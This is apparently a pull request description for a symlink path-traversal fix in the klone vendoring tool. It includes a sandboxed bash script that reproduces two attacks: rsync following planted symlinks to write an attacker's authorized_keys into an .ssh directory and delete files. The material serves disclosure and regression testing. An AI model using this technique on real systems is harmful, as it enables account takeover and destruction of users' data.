**CWE-59 / CWE-22** — Improper Link Resolution / Path Traversal.
**Branch:** `VC-53816`.

A standalone reviewer script is embedded at the bottom of this description
(see *verify.sh — click to expand*). It is fully sandboxed under
`/tmp/klone-vc-53816.*`, makes no network calls, and is removed on exit.

## The vulnerability

`cache.CloneWithCache` builds the destination from a manifest-supplied
`folder_name`, calls `os.MkdirAll(dest)` (which uses `Stat` and silently
follows symlinks), then runs `rsync -aEq --delete . dest`. There is no
`Lstat` check on any component of `dest`.

Two attack scenarios exploit this:

1. **Disclosed PoC — nested `folder_name`.** A manifest declares both `a`
   and `a/b`. Iteration 1 rsyncs upstream `a` and faithfully recreates a
   planted symlink `b -> /home/victim/.ssh`. Iteration 2 then rsyncs into
   `…/vendored/a/b`; rsync follows the top-level dest symlink and writes
   the attacker's `authorized_keys` into `.ssh`, `--delete`'ing the
   prior contents.
2. **Root-symlink variant.** A hostile checkout ships
   `vendored -> /home/victim/.ssh` directly. `MkdirAll`, `Cleanup`, and
   `rsync` all dereference it, with no manifest editing needed beyond
   pointing at a legitimate repo.

Both scenarios give the manifest author user-level code execution
(authorized_keys) and arbitrary data destruction (`--delete`).

## The fix

Defence is split between the two layers that actually walk the path —
each layer guards the symlinks it itself would otherwise follow.

`pkg/cache/clone.go` — the rsync invocation gains `--safe-links` (and
drops the redundant `-E`, see below). rsync's source-side filter skips
any symlink whose target is absolute or escapes the source tree, so a
hostile upstream cannot plant a symlink in iteration N that iteration
N+1 would later traverse. This closes scenario 1 cleanly without a
second Go-side walk.

`pkg/sync/sync.go` — `AssertNoSymlinkInSubpath(workDirPath, target)`
runs before `os.MkdirAll(workDirPath/target)` and
`treeNode.Cleanup(workDirPath/target)`. Those operations are pure-Go
filesystem walks that never reach rsync, so they need their own
`os.Lstat`-based check. The helper walks each segment of `target`,
rejecting any component whose `os.ModeSymlink` bit is set. This closes
scenario 2.

### Why drop `-E`

`-E` (`--executability`) is a no-op under `-a` (which implies
`--perms`), and it provokes an openrsync bug on macOS where the
AppleDouble shadow handler errors on companion files of safe-link-skipped
entries. Removing it costs nothing (executability bits are still
preserved via `--perms`) and avoids a Mac-only crash when `--safe-links`
filters a symlink. Verified empirically with `rsync -aq` vs `rsync -aEq`
on executable scripts: both produce identical `0755` output.

## How to review

### Prerequisites

- `go` (1.23+), `git`, `rsync` on `PATH`.
- This repo checked out at the PR branch.
- A local copy of the verification script. Expand the *verify.sh* block at
  the bottom of this description and save its contents to
  `/tmp/verify-vc-53816.sh`.

### Step 1 — confirm the CVE exists on pre-fix klone

```bash
# from the klone repo root, on upstream/main (pre-fix)
git fetch upstream
git checkout upstream/main
go build -o /tmp/klone-prefix ./

bash /tmp/verify-vc-53816.sh /tmp/klone-prefix
echo "exit=$?"
```

**Expected:** both scenarios `VULNERABLE`, exit code `1`.
- Scenario 1: `authorized_keys: ATTACKER-KEY`, `known_hosts: DELETED`.
- Scenario 2: `decoy/important` deleted.

If scenario 1 reports `INCONCLUSIVE`, your host's rsync does not follow
top-level dest symlinks (macOS openrsync) — the disclosed vector cannot
be demonstrated there. Scenario 2 still runs and must report
`VULNERABLE`.

### Step 2 — confirm the fix blocks both scenarios

```bash
# on the PR branch (VC-53816)
git checkout VC-53816
go build -o /tmp/klone-patched ./

bash /tmp/verify-vc-53816.sh /tmp/klone-patched
echo "exit=$?"
```

**Expected:** exit code `0`. Scenario 1 reports
`BLOCKED upstream of klone (target unchanged …)` because rsync's
`--safe-links` filter runs before any klone-side message is emitted —
the marker file remains unchanged. Scenario 2 reports
`BLOCKED by klone (AssertNoSymlinkInSubpath …)`.

### Step 3 — run the regression tests

```bash
go test ./pkg/cache/... ./pkg/sync/...
```

**Expected:** all green. Notable:
- `TestAssertNoSymlinkInSubpath` covers the helper directly.
- `TestSyncFolder_TargetSymlinkRejected` is the end-to-end regression for
  the root-symlink variant.

## Side-effect statement

The script creates everything under `/tmp/klone-vc-53816.*`. The trap on
exit removes it (set `KEEP_SANDBOX=1` to retain). No file outside that
sandbox is created, modified, or deleted at any point.


---

<details>
<summary><b>verify.sh</b> — click to expand the standalone reviewer script</summary>

Save the block below to `/tmp/verify-vc-53816.sh` before running the
steps above.

```bash
#!/usr/bin/env bash
# CVEs/VC-53816/verify.sh
# Standalone verification of VC-53816 (symlink traversal in cache rsync).
# Exit 0 = klone blocks both attack scenarios (or the host's rsync cannot
# trigger the disclosed one). Exit 1 = klone is vulnerable to either.
#
# Per-scenario results map to the defence layer that caught the attack:
#   BLOCKED_BY_KLONE_GUARD       — pkg/cache AssertNoSymlinkInSubpath fired
#                                  (Go-side walk, emits a (VC-53816) marker)
#   BLOCKED_BY_RSYNC_SAFE_LINKS  — rsync skipped the planted symlink because
#                                  klone passes --safe-links (still klone's
#                                  defence; the choice of flag is the fix)
#   INCONCLUSIVE                 — host rsync cannot fire the disclosed
#                                  scenario at all (e.g. macOS openrsync)
#   VULNERABLE / UNEXPECTED_PASS — failure modes; exit 1
#
# Two scenarios are exercised:
#   1. Disclosed PoC — symlink planted by iteration 1 (a -> /tmp/...) and
#      followed by iteration 2's rsync into a/b.
#   2. Root-symlink variant — `vendored` itself is pre-planted as a symlink
#      (e.g. by a hostile checkout). MkdirAll/Cleanup/rsync all dereference
#      it absent a guard on the `target` component.
#
# Usage:
#   KLONE=/path/to/klone   bash verify.sh
#   bash verify.sh /path/to/klone
#
# Reviewer workflow:
#   1. Build klone from cert-manager/klone main (pre-fix) — expect VULNERABLE.
#   2. Build klone from the VC-53816 branch — expect BLOCKED.
#
# Side effects: every artifact is created inside a fresh sandbox under /tmp
# and removed on exit (set KEEP_SANDBOX=1 to retain). No file outside the
# sandbox is created, modified, or deleted.

set -u

KLONE="${KLONE:-${1:-}}"
if [[ -z "$KLONE" ]]; then
    echo "usage: KLONE=/path/to/klone $0   (or pass the path as \$1)" >&2
    exit 2
fi
if [[ ! -x "$KLONE" ]]; then
    echo "error: $KLONE is not an executable file" >&2
    exit 2
fi
for tool in git rsync; do
    if ! command -v "$tool" >/dev/null 2>&1; then
        echo "error: required tool '$tool' not on PATH" >&2
        exit 2
    fi
done

WORK="$(mktemp -d /tmp/klone-vc-53816.XXXXXX)"
if [[ "${KEEP_SANDBOX:-0}" != "1" ]]; then
    trap 'rm -rf "$WORK"' EXIT
fi

# Sandbox-only commits: pin identity inline and disable signing so a host
# with commit.gpgsign=true (and a locked keyring) doesn't silently fail
# `git commit`, which would leave HASH_* empty and make the run a false
# negative — klone would never reach the attack code path.
GIT_AUTHOR=(
    "-c" "user.email=verify@example.invalid"
    "-c" "user.name=verify"
    "-c" "commit.gpgsign=false"
    "-c" "tag.gpgsign=false"
)

hr() { printf -- '─%.0s' {1..72}; printf '\n'; }
section() { hr; echo "### $*"; hr; }

section "VC-53816 — Environment"
echo "klone binary  : $KLONE"
"$KLONE" --version 2>/dev/null || echo "(klone --version returned non-zero; continuing)"
echo "git version   : $(git --version)"
echo "rsync version : $(rsync --version | head -1)"
echo "sandbox       : $WORK"
echo

# Precondition: VC-53816 (scenario 1) requires that the system rsync follows
# a top-level dest symlink. GNU rsync >= 3 does; openrsync (older macOS) does
# not. Scenario 2 (root-symlink) does not depend on rsync behaviour.
echo "Probing rsync top-level dest-symlink behaviour..."
mkdir -p "$WORK/rsync-probe/src" "$WORK/rsync-probe/real"
echo PAYLOAD > "$WORK/rsync-probe/src/probe"
echo VICTIM  > "$WORK/rsync-probe/real/victim"
ln -s "$WORK/rsync-probe/real" "$WORK/rsync-probe/dest"
( cd "$WORK/rsync-probe/src" && rsync -aEq --delete . "$WORK/rsync-probe/dest" )
if [[ -e "$WORK/rsync-probe/real/probe" && ! -e "$WORK/rsync-probe/real/victim" ]]; then
    RSYNC_FOLLOWS=yes
    echo "  YES — rsync follows top-level dest symlink (scenario 1 fireable here)"
else
    RSYNC_FOLLOWS=no
    echo "  NO  — rsync does NOT follow top-level dest symlinks here."
    echo "  Scenario 1 cannot be demonstrated on this host (will be INCONCLUSIVE)."
fi
echo

############################################################
# Scenario 1 — disclosed PoC (nested folder_name)
############################################################
section "VC-53816 — Scenario 1: nested folder_name symlink"
SB="$WORK/poc"
TGT="$SB/target-ssh"   # stand-in for /root/.ssh, kept inside the sandbox
mkdir -p "$SB/srv" "$SB/project" "$SB/cache" "$TGT"
echo VICTIM-KEY   > "$TGT/authorized_keys"
echo VICTIM-OTHER > "$TGT/known_hosts"

# repoA: contains symlink b -> $TGT
git init -q --bare "$SB/srv/repoA.git"
dA="$SB/repoA-work"; mkdir -p "$dA"
( cd "$dA" && git init -q && ln -s "$TGT" b && git add b \
    && git "${GIT_AUTHOR[@]}" commit -qm a \
    && git push -q "$SB/srv/repoA.git" HEAD:main )
HASH_A=$(git -C "$dA" rev-parse HEAD)

# repoB: payload authorized_keys
git init -q --bare "$SB/srv/repoB.git"
dB="$SB/repoB-work"; mkdir -p "$dB"
( cd "$dB" && git init -q && echo ATTACKER-KEY > authorized_keys \
    && git add authorized_keys \
    && git "${GIT_AUTHOR[@]}" commit -qm b \
    && git push -q "$SB/srv/repoB.git" HEAD:main )
HASH_B=$(git -C "$dB" rev-parse HEAD)

cat > "$SB/project/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: a
      repo_url: $SB/srv/repoA.git
      repo_ref: main
      repo_hash: $HASH_A
      repo_path: .
    - folder_name: a/b
      repo_url: $SB/srv/repoB.git
      repo_ref: main
      repo_hash: $HASH_B
      repo_path: .
EOF

( cd "$SB/project" && KLONE_CACHE_DIR="$SB/cache" "$KLONE" sync ) \
    > "$SB/run.log" 2>&1 || true

if [[ "$RSYNC_FOLLOWS" == "no" ]]; then
    RESULT_1=INCONCLUSIVE
    echo "Result: INCONCLUSIVE — this host's rsync does not follow top-level"
    echo "        dest symlinks, so the attack cannot be demonstrated here."
elif grep -q ATTACKER-KEY "$TGT/authorized_keys" 2>/dev/null; then
    RESULT_1=VULNERABLE
    echo "Result: VULNERABLE — attacker payload written into $TGT"
    echo "        authorized_keys: $(cat "$TGT/authorized_keys")"
    echo "        known_hosts    : $(test -e "$TGT/known_hosts" && echo PRESENT || echo DELETED)"
elif grep -q "(VC-53816)" "$SB/run.log" 2>/dev/null; then
    RESULT_1=BLOCKED_BY_KLONE_GUARD
    echo "Result: BLOCKED by klone (AssertNoSymlinkInSubpath refused to traverse planted symlink)"
else
    # No klone-emitted marker, but the target file is untouched. That is the
    # expected outcome under the fix: klone passes --safe-links to rsync, and
    # rsync silently skips the planted absolute symlink at copy time during
    # iteration 1, so iteration 2 sees a clean tree and never reaches the
    # exploit. The defence is klone's (klone chooses --safe-links), even
    # though no klone-side error is logged.
    RESULT_1=BLOCKED_BY_RSYNC_SAFE_LINKS
    echo "Result: BLOCKED by klone via rsync --safe-links (target unchanged; planted"
    echo "        symlink was skipped at copy time in iteration 1, so iteration 2"
    echo "        wrote into a real directory). See $SB/run.log for the klone trace."
fi
echo

############################################################
# Scenario 2 — root-symlink variant
############################################################
section "VC-53816 — Scenario 2: target dir pre-planted as symlink"
SB2="$WORK/root-sym"
DECOY="$SB2/decoy"
mkdir -p "$SB2/srv" "$SB2/project" "$SB2/cache" "$DECOY"
echo VICTIM-IMPORTANT > "$DECOY/important"

# A trivial legit repo for the manifest to point at.
git init -q --bare "$SB2/srv/repo.git"
dR="$SB2/repo-work"; mkdir -p "$dR"
( cd "$dR" && git init -q && echo hello > file.txt \
    && git add file.txt \
    && git "${GIT_AUTHOR[@]}" commit -qm r \
    && git push -q "$SB2/srv/repo.git" HEAD:main )
HASH_R=$(git -C "$dR" rev-parse HEAD)

# Hostile pre-state: `vendored` in the project dir is a symlink to the
# decoy directory. This is the kind of layout a hostile checkout could
# carry: no manifest edit needed beyond pointing at a legit repo.
ln -s "$DECOY" "$SB2/project/vendored"

cat > "$SB2/project/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: subdir
      repo_url: $SB2/srv/repo.git
      repo_ref: main
      repo_hash: $HASH_R
      repo_path: .
EOF

( cd "$SB2/project" && KLONE_CACHE_DIR="$SB2/cache" "$KLONE" sync ) \
    > "$SB2/run.log" 2>&1 || true

if [[ ! -e "$DECOY/important" ]]; then
    RESULT_2=VULNERABLE
    echo "Result: VULNERABLE — Cleanup walked through the symlink and deleted"
    echo "        $DECOY/important"
elif grep -q "(VC-53816)" "$SB2/run.log" 2>/dev/null; then
    RESULT_2=BLOCKED_BY_KLONE_GUARD
    echo "Result: BLOCKED by klone (AssertNoSymlinkInSubpath refused to traverse the target-level symlink)"
else
    # Scenario 2 lives entirely in Go (MkdirAll/Cleanup), never reaches rsync,
    # so --safe-links cannot account for a no-marker pass. Treat as unexpected.
    RESULT_2=UNEXPECTED_PASS
    echo "Result: UNEXPECTED — decoy intact, but no klone-side rejection in $SB2/run.log."
    echo "        Scenario 2 has no rsync involvement; investigate."
fi
echo

section "VC-53816 — Summary"
printf '  %-32s : %s\n' "Scenario 1 (nested symlink)" "$RESULT_1"
printf '  %-32s : %s\n' "Scenario 2 (root symlink)"   "$RESULT_2"
echo
if [[ "${KEEP_SANDBOX:-0}" == "1" ]]; then
    echo "Sandbox preserved at: $WORK"
fi

exit_code=0
for r in "$RESULT_1" "$RESULT_2"; do
    case "$r" in
        # All three pass the suite: klone's Go-side guard, klone's choice of
        # rsync --safe-links, or a host where the disclosed vector is
        # unfireable (scenario 1 only).
        BLOCKED_BY_KLONE_GUARD|BLOCKED_BY_RSYNC_SAFE_LINKS|INCONCLUSIVE) ;;
        *)                                                              exit_code=1 ;;
    esac
done
exit "$exit_code"
```

</details>
